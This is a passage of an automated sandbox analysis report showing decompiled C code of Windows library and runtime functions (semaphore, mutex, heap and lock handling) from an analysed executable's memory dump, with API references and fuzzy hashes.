Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: CharNext
String ID: /$localserver$sta
API String ID: 3213498283-3694077230
Opcode ID: 2b1b8d8b0162df9925bcb8ad83849cc5a86836d80ca7363274bc3533be85fb0a
Instruction ID: 826225bd37c096f3dd947708a665bc2cce704b1e26b37165a98019764deadc7c
Opcode Fuzzy Hash: 2b1b8d8b0162df9925bcb8ad83849cc5a86836d80ca7363274bc3533be85fb0a
Instruction Fuzzy Hash: F481D37DA04A16CBCF60DF599810B7DB3F1EF94752B64406EE885E7280EA70AEC1D750

Uniqueness

Uniqueness Score: -1.00%

Function 000C2B89 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E000C2B89(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v532;
				intOrPtr* _v536;
				intOrPtr* _v540;
				void* _v544;
				short _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t18;
				int _t31;
				void* _t32;
				int _t41;
				void* _t42;
				void* _t44;
				void* _t45;
				signed int _t46;

				_t48 = (_t46 & 0xfffffff8) - 0x21c;
				_v8 =  *0xc8018 ^ (_t46 & 0xfffffff8) - 0x0000021c;
				_t18 = _a4;
				_t39 = 0x104;
				_push(_t31);
				_push(__ecx);
				_t41 = 0;
				_v536 = _t18;
				 *_t18 = 0;
				 *((intOrPtr*)(_t18 + 4)) = 0;
				E000C1F6F( &_v532, 0x104, __ecx, __ecx);
				_t35 =  &_v544;
				E000C1ED6( &_v544, L"_p0");
				_t44 = OpenSemaphoreW(0x1f0003, 0,  &_v548);
				if(_t44 != 0) {
					_t39 =  &_v544;
					_v544 = 0;
					_t36 = _t44;
					_t31 = E000C2A6E(_t44, _t39);
					if(_t31 >= 0) {
						_t35 = _v540;
						asm("cdq");
						 *_t35 = _v544;
						 *((intOrPtr*)(_t35 + 4)) = _t39;
					} else {
						_t35 = _v0;
						_t39 = 0xce;
						E000C2906(_t36, _t31);
						_t41 = _t31;
					}
				} else {
					if(GetLastError() != 2) {
						_t35 = _v0;
						_t39 = 0xc8;
						_t41 = E000C2925("wil");
					}
				}
				if(_t44 != 0) {
					_push(_t44);
					E000C2981(_t31, _t35);
				}
				_pop(_t42);
				_pop(_t45);
				_pop(_t32);
				return E000C6160(_t41, _t32, _v12 ^ _t48, _t39, _t42, _t45);
			}

0x000c2b91
0x000c2b9e
0x000c2ba5
0x000c2ba8
0x000c2bad
0x000c2bb0
0x000c2bb2
0x000c2bb4
0x000c2bbd
0x000c2bbf
0x000c2bc2
0x000c2bcc
0x000c2bd0
0x000c2be6
0x000c2bea
0x000c2c0d
0x000c2c11
0x000c2c15
0x000c2c1c
0x000c2c20
0x000c2c35
0x000c2c3d
0x000c2c3e
0x000c2c40
0x000c2c22
0x000c2c24
0x000c2c27
0x000c2c2c
0x000c2c31
0x000c2c31
0x000c2bec
0x000c2bf5
0x000c2bf7
0x000c2bfa
0x000c2c09
0x000c2c09
0x000c2bf5
0x000c2c45
0x000c2c47
0x000c2c48
0x000c2c48
0x000c2c56
0x000c2c57
0x000c2c58
0x000c2c63

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 000C2BE0
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000C2BEC

Strings

_p0, xrefs: 000C2BC7
wil, xrefs: 000C2BFF

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ErrorLastOpenSemaphore
String ID: _p0$wil
API String ID: 1909229842-1814513734
Opcode ID: cef04182282bdd432dff6a16e5a8c31d65a1d37a7d5380e866881f4e8eace584
Instruction ID: 05378d7d5c2d3442994b8ef41461df0f407d19308a128fea7442dbac9ef6b360
Opcode Fuzzy Hash: cef04182282bdd432dff6a16e5a8c31d65a1d37a7d5380e866881f4e8eace584
Instruction Fuzzy Hash: 7221DEB12043029BD324EF28C895EAFB7E9EBD8310F10461DF85587292DB30DD058AA2

Uniqueness

Uniqueness Score: -1.00%

Function 000C48F3 Relevance: 6.4, APIs: 5, Instructions: 110
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E000C48F3(long* __ecx, signed int* __edx, intOrPtr* _a4) {
				intOrPtr _v0;
				int _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				intOrPtr* _v24;
				void* _v32;
				long* _v44;
				void* __ebx;
				unsigned int _t36;
				long* _t38;
				intOrPtr* _t44;
				unsigned int _t49;
				signed int* _t58;
				void* _t59;
				intOrPtr _t61;
				long* _t63;
				signed int _t70;
				long* _t79;
				void* _t81;
				void* _t82;
				long* _t87;
				void* _t88;
				int _t90;
				void* _t91;

				_t63 = __ecx;
				_t58 = __edx;
				_t87 = __ecx;
				 *_a4 = 0;
				_t36 = HeapAlloc(GetProcessHeap(), 8, 0x40);
				_v20 = _t36;
				if(_t36 != 0) {
					_v12 = 0;
					_v8 = 0;
					if((_t36 & 0x00000003) != 0) {
						E000C297B(_t36);
						asm("int3");
						_push(_t63);
						_v44 = _t63;
						_t38 = _t63 + 0x28;
						_push(0);
						_t79 = _v44;
						_v44 = _t38;
						if(_t79 != _t38) {
							_push(_t58);
							_push(_t87);
							do {
								_t59 =  *_t79;
								if(_t59 != 0) {
									do {
										_t88 = _t59;
										_t59 =  *(_t59 + 0x1c);
										E000C2D7A(_t88);
										HeapFree(GetProcessHeap(), 0, _t88);
									} while (_t59 != 0);
									_t38 = _v12;
								}
								 *_t79 = 0;
								_t79 =  &(_t79[1]);
							} while (_t79 != _t38);
						}
						return _t38;
					} else {
						_push(0);
						_t81 = E000C29CD( &_v12, _t87, _t63, _t36 >> 2);
						if(_t81 >= 0) {
							_t44 = _v24;
							_t90 = 0x30;
							 *_t44 = 1;
							_t82 = _t44 + 0x10;
							 *(_t44 + 4) =  *_t58;
							 *_t58 =  *_t58 & 0x00000000;
							_t61 = 0;
							 *((intOrPtr*)(_t44 + 8)) = _v16;
							 *((intOrPtr*)(_t44 + 0xc)) = _v12;
							_v16 = 0;
							_v20 = 0;
							_v12 = 0;
							memset(_t82, 0, _t90);
							 *_t82 = _t90;
							 *((intOrPtr*)(_t82 + 4)) = 1;
							_t91 = 0;
							_t70 = 0xa;
							memset(_t82 + 8, 0, _t70 << 2);
							_t72 = _a4;
							_t81 = 0;
							 *_a4 = _v24;
							_t49 = _v20;
						} else {
							_t72 = _v0;
							E000C2906( &_v12, _t81);
							_t49 = _v20;
							_t61 = _v24;
							_t91 = _v32;
						}
						if(_t49 != 0) {
							_push(_t49);
							E000C2981(_t61, _t72);
						}
						if(_t61 != 0) {
							_push(_t61);
							E000C2981(_t61, _t72);
						}
						if(_t91 != 0) {
							HeapFree(GetProcessHeap(), 0, _t91);
						}
						goto L12;
					}
				} else {
					_t81 = 0x8007000e;
					E000C2906(_t63, 0x8007000e);
					L12:
					return _t81;
				}
			}

0x000c48f3
0x000c4908
0x000c490c
0x000c490e
0x000c4917
0x000c491d
0x000c4923
0x000c493e
0x000c4942
0x000c4948
0x000c4a1a
0x000c4a1f
0x000c4a25
0x000c4a26
0x000c4a29
0x000c4a2c
0x000c4a2d
0x000c4a30
0x000c4a35
0x000c4a37
0x000c4a38
0x000c4a39
0x000c4a39
0x000c4a3d
0x000c4a3f
0x000c4a3f
0x000c4a41
0x000c4a46
0x000c4a55
0x000c4a5b
0x000c4a5f
0x000c4a5f
0x000c4a62
0x000c4a68
0x000c4a6b
0x000c4a70
0x000c4a75
0x000c494e
0x000c494e
0x000c495e
0x000c4962
0x000c4981
0x000c4987
0x000c4989
0x000c498f
0x000c4994
0x000c4997
0x000c499a
0x000c49a0
0x000c49a7
0x000c49ae
0x000c49b2
0x000c49b6
0x000c49ba
0x000c49c2
0x000c49c5
0x000c49d1
0x000c49d5
0x000c49d6
0x000c49d8
0x000c49db
0x000c49e1
0x000c49e3
0x000c4964
0x000c4966
0x000c496e
0x000c4973
0x000c4977
0x000c497b
0x000c497b
0x000c49e9
0x000c49eb
0x000c49ec
0x000c49ec
0x000c49f3
0x000c49f5
0x000c49f6
0x000c49f6
0x000c49fd
0x000c4a09
0x000c4a09
0x00000000
0x000c49fd
0x000c4925
0x000c4925
0x000c4934
0x000c4a0f
0x000c4a17
0x000c4a17

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000040,?,00000000,?,?,?,000C47C2,?,?,?,?,00000000), ref: 000C4910
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,000C47C2,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 000C4917
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,000C47C2,?,?,?,?,00000000), ref: 000C4A02
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?,?,000C47C2,?,?,?,?,00000000), ref: 000C4A09

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 17dadb1cbdebc88b0a211c5b244e6fce5a49f4cde7530af0ffa73a3c3c245320
Instruction ID: f93390a67fcab0c34385615a10f6ab1bbef1888ed0ae9e8ab299572ec5020713
Opcode Fuzzy Hash: 17dadb1cbdebc88b0a211c5b244e6fce5a49f4cde7530af0ffa73a3c3c245320
Instruction Fuzzy Hash: 1B3176B2604311AFD714DF29C859F5BBBE8FF89350F00452DF9489B291CB749800CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 000C3168 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(000C8490), ref: 000C31BB
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(000C8490), ref: 000C31D1

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID:
API String ID: 17069307-0
Opcode ID: 74531c9e68c9782cd28790408fff3e0cd8a9c3e30583cd89c7a576cb60406b3c
Instruction ID: f47c4edeadd694b7fbbab40f0d322864d55c526a9120515a893a693eb0c2d04c
Opcode Fuzzy Hash: 74531c9e68c9782cd28790408fff3e0cd8a9c3e30583cd89c7a576cb60406b3c
Instruction Fuzzy Hash: 59218132721205EF9B64CF98DC89E5E77E5EF4532131DC06DE9059B211CB359E40DB54

Uniqueness

Uniqueness Score: -1.00%

Function 000C5E30 Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C5E30() {
				signed int _t10;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				void* _t25;

				_t25 =  *0xc0000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0xc003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t19 + 0xc0000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0xc0000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0xc0018; // 0xc0e010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0xc0074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0xc0074)) > 0xe) {
								__eflags =  *(_t19 + 0xc00e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0xc0084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0xc0084)) > 0xe) {
									__eflags =  *(_t19 + 0xc00f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0xc8048 = _t10;
				__set_app_type(E000C65FE(2));
				 *0xc84ec =  *0xc84ec | 0xffffffff;
				 *0xc84f0 =  *0xc84f0 | 0xffffffff;
				 *(__p__fmode()) =  *0xc8380;
				 *(__p__commode()) =  *0xc8374;
				_t15 = E000C6820();
				if( *0xc8014 == 0) {
					__setusermatherr(E000C6820);
				}
				E000C6823(_t15);
				return 0;
			}

0x000c5e35
0x000c5e3c
0x000c5e42
0x000c5e48
0x000c5e52
0x00000000
0x000c5e54
0x000c5e54
0x000c5e54
0x000c5e5b
0x000c5e60
0x000c5e7c
0x000c5e7e
0x000c5e85
0x000c5e87
0x00000000
0x000c5e87
0x000c5e62
0x000c5e62
0x000c5e67
0x00000000
0x000c5e69
0x000c5e69
0x000c5e6b
0x000c5e72
0x000c5e74
0x000c5e8d
0x000c5e8d
0x000c5e8d
0x000c5e8d
0x000c5e8d
0x000c5e72
0x000c5e67
0x000c5e60
0x000c5e3e
0x000c5e3e
0x000c5e3e
0x000c5e3e
0x000c5e92
0x000c5e9d
0x000c5ea3
0x000c5eaa
0x000c5ebf
0x000c5ecd
0x000c5ecf
0x000c5edb
0x000c5ee2
0x000c5ee8
0x000c5ee9
0x000c5ef0

APIs

__set_app_type.MSVCRT ref: 000C5E9D
__p__fmode.MSVCRT ref: 000C5EB3
__p__commode.MSVCRT ref: 000C5EC1
__setusermatherr.MSVCRT ref: 000C5EE2

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1063105408-0
Opcode ID: c11dde9518c379fb85fb7df4d1935fee4d7ab14db00e2ec3ff28de85db967225
Instruction ID: bdd0e29aa01279575da936009f3a3c3690810cbfe27c0acb6c4c63aa4c0a8429
Opcode Fuzzy Hash: c11dde9518c379fb85fb7df4d1935fee4d7ab14db00e2ec3ff28de85db967225
Instruction Fuzzy Hash: E6114874900A01CFE7B89B30AC4DF6C37A1B705326F354A7DE1658A1E1DB3A9AC5CB10

Uniqueness

Uniqueness Score: -1.00%

Function 000C4671 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E000C4671(void* __ecx, signed int* __edx, void* __edi, void* __eflags) {
				signed int _v0;
				signed int _v8;
				char _v528;
				signed int _v532;
				signed int _v536;
				signed int _v544;
				signed int _v548;
				void* __ebx;
				void* __esi;
				signed int _t35;
				signed int* _t46;
				signed int _t56;
				signed int _t59;
				signed int _t60;

				_t55 = __edi;
				_t54 = __edx;
				_v8 =  *0xc8018 ^ _t60;
				_t46 = __edx;
				 *((intOrPtr*)(__edx)) = 0;
				E000C1F2B( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
				_v532 = 0;
				__imp__CreateMutexExW(0,  &_v528, 0, 0x1f0001, 0x40, __ecx);
				E000C45EB( &_v532,  &_v528);
				if(_v532 != 0) {
					_push(__edi);
					E000C4A76( &_v532, _t54,  &_v536);
					_v548 = 0;
					_t50 =  &_v528;
					_v544 = 0;
					_t56 = 0;
					_t59 = E000C2B89(_t50, __eflags,  &_v548,  &_v532);
					__eflags = _t59;
					if(_t59 >= 0) {
						_t35 = _v548;
						_t59 = 0;
						__eflags = 0;
					} else {
						_push(_t59);
						_push(_t50);
						_t50 = _v0;
						_t54 = 0x61;
						E000C2906();
						_t35 = 0;
					}
					__eflags = _t59;
					if(_t59 >= 0) {
						_t56 = _t35 << 2;
						_t59 = 0;
						__eflags = 0;
					} else {
						_push(_t59);
						_push(_t50);
						_t50 = _v0;
						_t54 = 0x6a;
						E000C2906();
					}
					__eflags = _t59;
					if(_t59 >= 0) {
						__eflags = _t56;
						if(_t56 == 0) {
							_t54 =  &_v532;
							_t50 =  &_v528;
							_t59 = E000C48F3( &_v528,  &_v532, _t46);
							__eflags = _t59;
							if(_t59 >= 0) {
								L12:
								_t59 = 0;
								__eflags = 0;
								goto L13;
							}
							_t54 = 0x129;
							goto L20;
						}
						 *_t46 = _t56;
						_t50 =  *_t56 + 1;
						__eflags = _t50;
						 *( *_t46) = _t50;
						goto L12;
					} else {
						_t54 = 0x121;
						L20:
						_t50 = _v0;
						E000C2906(_v0, _t59);
						L13:
						__eflags = _v536;
						_pop(_t55);
						if(_v536 != 0) {
							_push(_v536);
							E000C29A8(_t50);
						}
						__eflags = _v532;
						if(_v532 != 0) {
							_push(_v532);
							E000C2981(_t46, _t50);
						}
						L17:
						return E000C6160(_t59, _t46, _v8 ^ _t60, _t54, _t55, _t59);
					}
				}
				_t59 = E000C24CD( &_v532);
				goto L17;
			}

0x000c4671
0x000c4671
0x000c4683
0x000c4688
0x000c468f
0x000c46a9
0x000c46b1
0x000c46c5
0x000c46d2
0x000c46dd
0x000c46eb
0x000c46fc
0x000c4708
0x000c470f
0x000c4715
0x000c471b
0x000c4722
0x000c4724
0x000c4726
0x000c4739
0x000c473f
0x000c473f
0x000c4728
0x000c4728
0x000c4729
0x000c472a
0x000c472f
0x000c4730
0x000c4735
0x000c4735
0x000c4741
0x000c4743
0x000c4756
0x000c4759
0x000c4759
0x000c4745
0x000c4745
0x000c4746
0x000c4747
0x000c474c
0x000c474d
0x000c474d
0x000c475b
0x000c475d
0x000c4766
0x000c4768
0x000c47b1
0x000c47b7
0x000c47c2
0x000c47c4
0x000c47c6
0x000c4773
0x000c4773
0x000c4773
0x00000000
0x000c4773
0x000c47c8
0x00000000
0x000c47c8
0x000c476a
0x000c4770
0x000c4770
0x000c4771
0x00000000
0x000c475f
0x000c475f
0x000c47cd
0x000c47cf
0x000c47d2
0x000c4775
0x000c4775
0x000c477c
0x000c477d
0x000c477f
0x000c4785
0x000c4785
0x000c478a
0x000c4791
0x000c4793
0x000c4799
0x000c4799
0x000c479e
0x000c47af
0x000c47af
0x000c475d
0x000c46e4
0x00000000

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040,?,00000000,00000000), ref: 000C4691
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001,?,?,?,?,?,00000000), ref: 000C46C5

Part of subcall function 000C45EB: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,?,000C45CC,00000000,?,?,?,?,000C2A3B,?,00000001,?), ref: 000C45FB
Part of subcall function 000C45EB: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,000C45CC,00000000,?,?,?,?,000C2A3B,?,00000001,?), ref: 000C460A

Part of subcall function 000C48F3: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000040,?,00000000,?,?,?,000C47C2,?,?,?,?,00000000), ref: 000C4910
Part of subcall function 000C48F3: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,000C47C2,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 000C4917

Strings

Local\SM0:%d:%d:%hs, xrefs: 000C4698

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ErrorHeapLastProcess$AllocCreateCurrentMutex
String ID: Local\SM0:%d:%d:%hs
API String ID: 3112127618-4162240545
Opcode ID: bc59daffd820da0f0dd04ef011d470dac59f90bcf3ebbc66e09982a83f0c5e59
Instruction ID: 74b37c7b40756d4b837ea3bce2584538c2a7a3310a101d33a5c77fbbb7b78df1
Opcode Fuzzy Hash: bc59daffd820da0f0dd04ef011d470dac59f90bcf3ebbc66e09982a83f0c5e59
Instruction Fuzzy Hash: A041C27190423CABCB31EB64DC99FEE7769FB55710F100299F9096B282DB704E408BD0

Uniqueness

Uniqueness Score: -1.00%

Function 000C5460 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80040111,00000000), ref: 000C5594

Part of subcall function 000C3233: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(000C8490), ref: 000C3264
Part of subcall function 000C3233: DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 000C3273
Part of subcall function 000C3233: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(000C8490), ref: 000C3298

RoOriginateErrorW.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80070057,00000013,?), ref: 000C55CA

Strings

pActivatibleClassId, xrefs: 000C55B7

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ErrorLockOriginateShared$AcquireDecodePointerRelease
String ID: pActivatibleClassId
API String ID: 3068322146-955291698
Opcode ID: ee734fe00536cb2fca93207e0afa7ad0ce0a3fddb28b97b6188fe59ab37cc5a2
Instruction ID: 324ff7297c8cdfbf7cc494eb748ed0ff9542b07eb5331e98a3505666c5bdd9d8
Opcode Fuzzy Hash: ee734fe00536cb2fca93207e0afa7ad0ce0a3fddb28b97b6188fe59ab37cc5a2
Instruction Fuzzy Hash: 0D31D636A11A18ABDB209B54DC59FAE73BAEF14712F25405DEC02A7250D735FE80C790

Uniqueness

Uniqueness Score: -1.00%

Function 000C2C66 Relevance: 5.1, APIs: 4, Instructions: 106
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E000C2C66(void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _t48;
				intOrPtr* _t51;
				intOrPtr* _t54;
				void* _t56;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				void* _t81;
				void* _t82;
				void* _t83;
				long _t86;
				void* _t88;

				_t83 = __edi;
				_t67 = _a4;
				_t88 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _a8;
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t67 + 4));
				_t48 = __ecx + 0xc;
				 *_t48 = 0;
				_v16 = _t48;
				 *((short*)(__ecx + 0x10)) =  *((intOrPtr*)(_t67 + 0x20));
				 *((intOrPtr*)(__ecx + 0x14)) =  *_t67;
				_t51 = __ecx + 0x1c;
				 *_t51 = 0;
				_v20 = _t51;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t67 + 0x48));
				 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(_t67 + 0x4c));
				_t54 = __ecx + 0x28;
				 *_t54 = 0;
				_t70 =  *((intOrPtr*)(_t67 + 0x1c));
				_v24 = _t54;
				_t56 = 1;
				_v8 = 1;
				if(_t70 == 0) {
					L4:
					_t71 =  *((intOrPtr*)(_t67 + 0x44));
					_v12 = _t56;
					if(_t71 == 0) {
						L8:
						_push(_t83);
						_t57 = E000C24F0( *((intOrPtr*)(_t67 + 0xc)));
						_t86 = _t57 + _v8 + _v12;
						if( *(_t88 + 0x2c) == 0 ||  *(_t88 + 0x30) < _t86) {
							_t57 = HeapAlloc(GetProcessHeap(), 8, _t86);
							_v12 = _t57;
							if(_t57 != 0) {
								HeapFree(GetProcessHeap(), 0,  *(_t88 + 0x2c));
								_t57 = _v12;
								 *(_t88 + 0x2c) = _t57;
								 *(_t88 + 0x30) = _t86;
							}
						}
						_t73 =  *(_t88 + 0x2c);
						if(_t73 == 0) {
							return _t57;
						} else {
							_t90 = _t73 +  *(_t88 + 0x30);
							return E000C4ABE(E000C4B3C(E000C4B3C(_t73, _t73 +  *(_t88 + 0x30),  *((intOrPtr*)(_t67 + 0x1c)), _v16), _t73 +  *(_t88 + 0x30),  *((intOrPtr*)(_t67 + 0x44)), _v20), _t90,  *((intOrPtr*)(_t67 + 0xc)), _v24);
						}
					}
					_t81 = _t71 + 1;
					do {
						_t64 =  *_t71;
						_t71 = _t71 + 1;
					} while (_t64 != 0);
					_v8 = _t71 - _t81 + 1;
					goto L8;
				}
				_t82 = _t70 + 1;
				do {
					_t66 =  *_t70;
					_t70 = _t70 + 1;
				} while (_t66 != 0);
				_t56 = _t70 - _t82 + 1;
				goto L4;
			}

0x000c2c66
0x000c2c72
0x000c2c76
0x000c2c7a
0x000c2c80
0x000c2c83
0x000c2c86
0x000c2c88
0x000c2c8f
0x000c2c95
0x000c2c98
0x000c2c9b
0x000c2c9d
0x000c2ca3
0x000c2ca9
0x000c2cac
0x000c2caf
0x000c2cb1
0x000c2cb4
0x000c2cb9
0x000c2cba
0x000c2cbf
0x000c2cd0
0x000c2cd0
0x000c2cd3
0x000c2cd8
0x000c2cec
0x000c2cef
0x000c2cf0
0x000c2cfa
0x000c2d01
0x000c2d12
0x000c2d18
0x000c2d1d
0x000c2d2b
0x000c2d31
0x000c2d34
0x000c2d37
0x000c2d37
0x000c2d1d
0x000c2d3a
0x000c2d40
0x000c2d77
0x000c2d42
0x000c2d48
0x00000000
0x000c2d6d
0x000c2d40
0x000c2cda
0x000c2cdd
0x000c2cdd
0x000c2cdf
0x000c2ce0
0x000c2ce9
0x00000000
0x000c2ce9
0x000c2cc1
0x000c2cc4
0x000c2cc4
0x000c2cc6
0x000c2cc7
0x000c2ccd
0x00000000

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?), ref: 000C2D0B
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 000C2D12
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 000C2D24
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 000C2D2B

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 2a054e528feab3f1a09b75f302fab12b0899db88fd5f539cd9e992fe4badbe90
Instruction ID: b7d332616003fc1a239bf7a281d8c1df576500403bbdee02a81cf95f4c0e3e9e
Opcode Fuzzy Hash: 2a054e528feab3f1a09b75f302fab12b0899db88fd5f539cd9e992fe4badbe90
